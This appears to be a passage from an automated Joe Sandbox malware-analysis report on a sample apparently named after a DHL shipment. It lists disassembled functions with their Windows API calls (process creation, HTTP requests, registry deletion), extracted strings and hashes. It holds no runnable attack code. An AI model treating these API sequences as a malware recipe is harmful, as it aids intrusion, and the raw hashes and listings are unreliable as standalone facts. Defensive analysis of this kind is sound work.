                                                                                      • _wcslen.LIBCMT ref: 000A463F
                                                                                      • _wcslen.LIBCMT ref: 000A46A7
                                                                                        • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
                                                                                      • GetDriveTypeW.KERNEL32(?,000F6BF0,00000061), ref: 000A4743
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                      • API String ID: 2055661098-1000479233
                                                                                      • Opcode ID: adddfc66d5afbd216184b1093025e83866136dbb2488ab5875b665e6142caa43
                                                                                      • Instruction ID: d2a1812bbd474e24972d53bb10db3e7d02090945e7a4ff1ccd70960f7ef4f7e9
                                                                                      • Opcode Fuzzy Hash: adddfc66d5afbd216184b1093025e83866136dbb2488ab5875b665e6142caa43
                                                                                      • Instruction Fuzzy Hash: 10B113396083029FC720DF68C891ABEB7E5AFE6724F50491DF596C7292D7B0D884CB52
                                                                                      Function 000C6CD9 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 194windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?), ref: 000C6DEB
                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000C6E5F
                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000C6E81
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C6E94
                                                                                      • DestroyWindow.USER32(?), ref: 000C6EB5
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00030000,00000000), ref: 000C6EE4
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C6EFD
                                                                                      • GetDesktopWindow.USER32 ref: 000C6F16
                                                                                      • GetWindowRect.USER32(00000000), ref: 000C6F1D
                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000C6F35
                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000C6F4D
                                                                                        • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                      • String ID: 0$p]$tooltips_class32
                                                                                      • API String ID: 2429346358-3849672097
                                                                                      • Opcode ID: 91d13ae90adc0093fd39a620bee8aee1170fd3025f0364d5873497be6267cfd6
                                                                                      • Instruction ID: b017b32c78e96bad3adf4aecd18c57a2643719f05fcddfc59068efa8916e4db6
                                                                                      • Opcode Fuzzy Hash: 91d13ae90adc0093fd39a620bee8aee1170fd3025f0364d5873497be6267cfd6
                                                                                      • Instruction Fuzzy Hash: 55716774104244AFEB21CF18DC48FAABBF9FF89304F04042EF98A87261C776A946DB11
                                                                                      Function 000C911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 000C9147
                                                                                        • Part of subcall function 000C7674: ClientToScreen.USER32(?,?), ref: 000C769A
                                                                                        • Part of subcall function 000C7674: GetWindowRect.USER32(?,?), ref: 000C7710
                                                                                        • Part of subcall function 000C7674: PtInRect.USER32(?,?,000C8B89), ref: 000C7720
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 000C91B0
                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 000C91BB
                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 000C91DE
                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 000C9225
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 000C923E
                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 000C9255
                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 000C9277
                                                                                      • DragFinish.SHELL32(?), ref: 000C927E
                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 000C9371
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p]
                                                                                      • API String ID: 221274066-2210861112
                                                                                      • Opcode ID: 3c4183e1184e2b86dc3fd9c54495973467a131d37223a7c5dd71cd7ab9f230ae
                                                                                      • Instruction ID: 52f470cfe74db63665b0c585fe9429c552b44cc340035f33e815f0eee2c589a2
                                                                                      • Opcode Fuzzy Hash: 3c4183e1184e2b86dc3fd9c54495973467a131d37223a7c5dd71cd7ab9f230ae
                                                                                      • Instruction Fuzzy Hash: 22617A71108301AFE701DF64DC89EAFBBE8FF89750F00092EF595921A1DB709A49CB52
                                                                                      Function 000BAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 000BB198
                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000BB1B0
                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000BB1D4
                                                                                      • _wcslen.LIBCMT ref: 000BB200
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000BB214
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000BB236
                                                                                      • _wcslen.LIBCMT ref: 000BB332
                                                                                        • Part of subcall function 000A05A7: GetStdHandle.KERNEL32(000000F6), ref: 000A05C6
                                                                                      • _wcslen.LIBCMT ref: 000BB34B
                                                                                      • _wcslen.LIBCMT ref: 000BB366
                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000BB3B6
                                                                                      • GetLastError.KERNEL32(00000000), ref: 000BB407
                                                                                      • CloseHandle.KERNEL32(?), ref: 000BB439
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BB44A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BB45C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BB46E
                                                                                      • CloseHandle.KERNEL32(?), ref: 000BB4E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2178637699-0
                                                                                      • Opcode ID: 1dacb47b8c164f48548880120139258a73b8764f99a456f6d4b926e17ad0fd4d
                                                                                      • Instruction ID: 135386c8dc5a5162f8c728620feaeed5f677bc5b09857b3296003816d7d3a34d
                                                                                      • Opcode Fuzzy Hash: 1dacb47b8c164f48548880120139258a73b8764f99a456f6d4b926e17ad0fd4d
                                                                                      • Instruction Fuzzy Hash: CAF19C716083009FD725EF24C891BAEBBE5AF85714F14895DF8998B2A2CB71EC44CB52
                                                                                      Function 0003326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemCount.USER32(00101990), ref: 00072F8D
                                                                                      • GetMenuItemCount.USER32(00101990), ref: 0007303D
                                                                                      • GetCursorPos.USER32(?), ref: 00073081
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0007308A
                                                                                      • TrackPopupMenuEx.USER32(00101990,00000000,?,00000000,00000000,00000000), ref: 0007309D
                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000730A9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                      • String ID: 0
                                                                                      • API String ID: 36266755-4108050209
                                                                                      • Opcode ID: 1f2a634f45a69c04a7e2686254b7c986d3c6eb29ff310ab21e6841510e9a96c8
                                                                                      • Instruction ID: b760cad8f79e3e058591422984d926217442d5ecc026d8ff45c8b50e09cce0ef
                                                                                      • Opcode Fuzzy Hash: 1f2a634f45a69c04a7e2686254b7c986d3c6eb29ff310ab21e6841510e9a96c8
                                                                                      • Instruction Fuzzy Hash: 44710970A44205BEFB319F24CC89F9EBFA8FF04324F208226F5186A1E1C7B5A950D794
                                                                                      Function 000C541D Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 191windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 000C5504
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C5515
                                                                                      • CharNextW.USER32(00000158), ref: 000C5544
                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 000C5585
                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 000C559B
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C55AC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CharNext
                                                                                      • String ID: more than two branches$p]
                                                                                      • API String ID: 1350042424-2651976212
                                                                                      • Opcode ID: 56edf5c68b727cfea2674cfa3f168c9bad3059be28798056aac6bbc2e4b99394
                                                                                      • Instruction ID: 77b2b532268f8cca6a525c7ceb926acad27a4b7f9afcf1057e45b79ad79c2495
                                                                                      • Opcode Fuzzy Hash: 56edf5c68b727cfea2674cfa3f168c9bad3059be28798056aac6bbc2e4b99394
                                                                                      • Instruction Fuzzy Hash: 58619038904608AFEF208F54CC84EFF7BB9EB09726F104149F525A7291D774AAC1DB60
                                                                                      Function 00048BCD Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00048F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00048BE8,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048FC5
                                                                                      • DestroyWindow.USER32(?), ref: 00048C81
                                                                                      • KillTimer.USER32(00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048D1B
                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00086973
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 000869A1
                                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 000869B8
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000), ref: 000869D4
                                                                                      • DeleteObject.GDI32(00000000), ref: 000869E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                      • String ID: p]
                                                                                      • API String ID: 641708696-1923361398
                                                                                      • Opcode ID: 59058e88521bb4f40436b19b9e156708a4c6ca31db200dcc2bbb148da9c8f61e
                                                                                      • Instruction ID: b708711d5dcd142c9c273a3fe36a910396930281fd33be29a12bfc598ebf2fbc
                                                                                      • Opcode Fuzzy Hash: 59058e88521bb4f40436b19b9e156708a4c6ca31db200dcc2bbb148da9c8f61e
                                                                                      • Instruction Fuzzy Hash: C3618F70502610EFDB35AF14D988B2D77F1FB40316F15892DE086979A0CB7AA9C0CF59
                                                                                      Function 000AC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000AC4B0
                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000AC4C3
                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000AC4D7
                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000AC4F0
                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 000AC533
                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000AC549
                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000AC554
                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000AC584
                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000AC5DC
                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000AC5F0
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 000AC5FB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                      • String ID:
                                                                                      • API String ID: 3800310941-3916222277
                                                                                      • Opcode ID: 1f7fabff16f2035fe4700e455e621be117cf2b7f4995371c366ebf397a907563
                                                                                      • Instruction ID: 11b651ea5bc8e67933e2d4d2cb9fd2c4018ef2b4f1ea5e0a2fa157deb7b4f59b
                                                                                      • Opcode Fuzzy Hash: 1f7fabff16f2035fe4700e455e621be117cf2b7f4995371c366ebf397a907563
                                                                                      • Instruction Fuzzy Hash: FE516DB0500604BFFB218FA0C948EAB7BFCFF09744F014519F94A96610DB34E944DB60
                                                                                      Function 00049838 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                                                                      • GetSysColor.USER32(0000000F), ref: 00049862
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ColorLongWindow
                                                                                      • String ID: p]
                                                                                      • API String ID: 259745315-1923361398
                                                                                      • Opcode ID: 83898bba1e98336476fbe5ff62aae0cca45a9328caac1acd9ddffa782cd03ad3
                                                                                      • Instruction ID: d3703ca40d5d1052f4d57c946c56ec68ed54d76aedda3dbd9d73367a23782f0e
                                                                                      • Opcode Fuzzy Hash: 83898bba1e98336476fbe5ff62aae0cca45a9328caac1acd9ddffa782cd03ad3
                                                                                      • Instruction Fuzzy Hash: 32417271104640AFEB205B3DDC44FBA3BA5BB06330F284669FAA6871E5DB759C42DB24
                                                                                      Function 000C856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 000C8592
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85A2
                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85AD
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85BA
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000C85C8
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85D7
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000C85E0
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85E7
                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85F8
                                                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,000CFC38,?), ref: 000C8611
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 000C8621
                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 000C8641
                                                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 000C8671
                                                                                      • DeleteObject.GDI32(?), ref: 000C8699
                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000C86AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 3840717409-0
                                                                                      • Opcode ID: 7ef429d8cf9316a65b0a1cd253b75e7c67077e488775c452ec1867f5034f1a5f
                                                                                      • Instruction ID: 32152631a708fe18898ae450fa3a062024e5e919e0ada5931f875db4321d4c9d
                                                                                      • Opcode Fuzzy Hash: 7ef429d8cf9316a65b0a1cd253b75e7c67077e488775c452ec1867f5034f1a5f
                                                                                      • Instruction Fuzzy Hash: BF410A75600204BFEB119FA5DD88EAE7BB8FF89711F148058F909E7260DB749D01DB64
                                                                                      Function 000A14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(00000000), ref: 000A1502
                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 000A150B
                                                                                      • VariantClear.OLEAUT32(?), ref: 000A1517
                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 000A15FB
                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 000A1657
                                                                                      • VariantInit.OLEAUT32(?), ref: 000A1708
                                                                                      • SysFreeString.OLEAUT32(?), ref: 000A178C
                                                                                      • VariantClear.OLEAUT32(?), ref: 000A17D8
                                                                                      • VariantClear.OLEAUT32(?), ref: 000A17E7
                                                                                      • VariantInit.OLEAUT32(00000000), ref: 000A1823
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                      • API String ID: 1234038744-3931177956
                                                                                      • Opcode ID: e3af595ec9ae828f54dc6c3bb94b337a0b2920b754dcdf663c937626013110eb
                                                                                      • Instruction ID: bc6d2083f92c7e82dcec5c2161a838949098f11ef6d39a15563569aeb92b7912
                                                                                      • Opcode Fuzzy Hash: e3af595ec9ae828f54dc6c3bb94b337a0b2920b754dcdf663c937626013110eb
                                                                                      • Instruction Fuzzy Hash: FCD10E71E00A05EBEB209FA4D895BFDB7B5BF46700F10806AE456AF181DB30EC41DBA1
                                                                                      Function 000BB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BB6F4
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BB772
                                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 000BB80A
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000BB87E
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000BB89C
                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 000BB8F2
                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000BB904
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 000BB922
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 000BB983
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000BB994
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
